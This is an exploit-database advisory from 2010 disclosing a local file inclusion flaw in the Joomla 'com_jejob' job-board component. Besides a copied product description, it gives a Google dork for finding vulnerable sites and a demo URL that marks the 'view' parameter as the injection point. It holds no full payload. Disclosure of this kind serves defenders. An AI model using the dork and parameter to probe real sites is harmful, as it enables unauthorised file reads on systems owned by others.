Joomla! Component com_jejob - Local File Inclusion

EDB-ID:

14063

CVE:

N/A




Platform:

PHP

Date:

2010-06-26


Name : Joomla com_jejob LFI Vulnerability
Date : june, 26 2010
Critical Level     : HIGH
Vendor Url : http://joomlaextensions.co.in/jobcomponent/
Google Dork: inurl:com_jejob
Price:$25.00
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
User can search the job by Location or by Job Title or by Experience. User can also see the job category at the front page. Category wise

jobs are displayed in it. Click on the particular category it will display that category jobs. If user wants to apply for that job then click

on that job then it will display the job full description. Only registered user can applied for the job.
If new user register then he will gets the mail from administrator. Account detail for that user will be sent in that mail. If user has

applied the job then each time administrator and job company gets the mail form that user.
Admin can set the design of the job category page, job page and Job description page from the three different type of editor which will be

given in the Configuration Management. Default design will be given in the editors. Admin can make that own design for that pages.
There are three different managers in the admin side.
1. Category Management
2. Job Management
3. Fields Management
4. Form Layout
5. User Job
6. Configuration

#######################################################################################################
Xploit:com_jejob LFI Vulnerability


DEMO URL : http://server/jobcomponent/index.php?option=com_jejob&view=[LFI]

######################################################################